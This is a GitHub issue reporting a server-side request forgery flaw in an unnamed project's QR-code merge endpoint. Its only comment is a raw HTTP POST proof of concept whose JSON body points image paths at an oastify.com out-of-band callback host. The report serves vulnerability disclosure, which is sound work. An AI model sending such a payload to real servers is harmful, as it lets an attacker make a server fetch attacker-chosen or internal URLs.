Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ssrf #22

Open
Jecobo opened this issue Feb 28, 2024 · 1 comment
Open

ssrf #22

Jecobo opened this issue Feb 28, 2024 · 1 comment

Comments

@Jecobo
Copy link

Jecobo commented Feb 28, 2024

No description provided.

@Jecobo
Copy link
Author

Jecobo commented Feb 28, 2024

POC:
POST /api/public/qrcode/mergeList HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 202
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Authori-zation:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Type: application/json
Request-Origion: SwaggerBootstrapUi
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8081/doc.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

[
{
"path": "http://1.1fho8kog4tc58o251jju0bq09rfi38rx.oastify.com/1.png",
"x": 0,
"y": 0
},{
"path": "http://2.1fho8kog4tc58o251jju0bq09rfi38rx.oastify.com/2.png",
"x": 0,
"y": 0
}
]

image

image

image

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant